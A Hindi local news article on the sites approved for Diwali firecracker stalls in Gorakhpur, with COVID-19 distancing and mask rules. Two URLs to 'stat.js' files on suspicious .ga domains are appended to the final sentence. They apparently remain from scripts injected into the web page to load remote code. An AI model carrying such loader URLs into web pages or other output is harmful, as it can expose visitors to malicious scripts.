शहरों में नहीं मिलेगी दुकान लगाने की अनुमति इस बार दीपावली में यहां लगेंगी पटाखों की दुकानें। तारामंडल क्षेत्र की ओर रहने वाले लोगों को इस साल दीपावली पर पटाखे खरीदने भीड़भाड़ के बीच में नहीं जाना पड़ेगा। क्योंकि प्रशासन उसी क्षेत्र में 200 दुकानें लगा रहा है इसके साथ हर साल की तरह इस साल भी परंपरागत रूप से चंपा देवी पार्क में भी पटाखों की दुकानें लगाई जाएंगी। साथ ही गोरखपुर विकास प्राधिकरण की ओर से लेक व्यू के पास बनाए गए दिग्विजय नाथ पार्क में पटाखों की दुकान लगाने की मंजूरी दी गई है।

 

 

 

 

दोनों स्थानों पर करीबन सौ सौ दुकानें‌ लगाई जाएंगी। इस साल करीब 12 स्थानों पर पटाखे लगाने की अनुमति दी गई है। कोरोना वायरस को लेकर इस साल पटाखों की दुकान लगाने को लेकर थोड़ा संस्था मगर नियमित रूप से दुकानें लगाने वाले निरंतर जिला प्रशासन के चक्कर काटते रहे। इसलिए दशहरे के बाद दुकानें लगाने को लेकर फैसला किया गया। और अब अग्निशमन अधिकारी की रिपोर्ट के आधार पर स्थानों का चयन किया जा रहा है।

 

 

 

इस रिपोर्ट में 10 नवंबर बोरिंग के पास तथा गिरधर गंज प्राथमिक स्कूल के परिसर के आसपास घनी आबादी के कारण पटाखों की दुकानें को मुफीद नहीं माना गया है।राजकीय जुबली इंटर कॉलेज के प्रधानाचार्य के द्वारा मैदानों में पौधों को नुकसान पहुंचाने की बात लिखी गई। लेकिन कुछ शर्तों के आधार पर यहां दुकानें लगाने की अनुमति दी जा रही है इस बार कचहरी में 50% कम दुकानों लगाने की अनुमति है। इस साल सेंट एंड्रयूज में भी दुकानें लगाने की अनुमति है। इस साल दुकानों लगाने के साथ कोरोनावायरस को भी ध्यान में रखना है।

 

 

 

 

सभी से 6 फीट की दूरी बरतनी होगी कोई भी दुकानें सजी हुई नहीं लगी होंगी सारी दुकानों को दूर-दूर लगाना है इसी कारण कचहरी में इस बार 50% कम दुकानें लग रही है। सभी दुकानों को दूर-दूर लगाने के आदेश दिए गए हैं। ग्राहकों को मास्क पहनना अनिवार्य है और ग्राहकों को जागरूक भी करना है मास्क पहनने और सोशल डिस्टेंसिंग के लिए। और पटाखों की दुकान को लेकर स्थान जल्द ही फाइनल कर लिया जाएगा। इस बार तारामंडल में स्थित दिग्विजय नाथ पार्क में 20 और दुकाने लगेंगी इस जगह पर पहली बार दुकानें लग रही है। हर जगह कोरोनावायरस ने के लिए उपाय किए जाएंगे।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.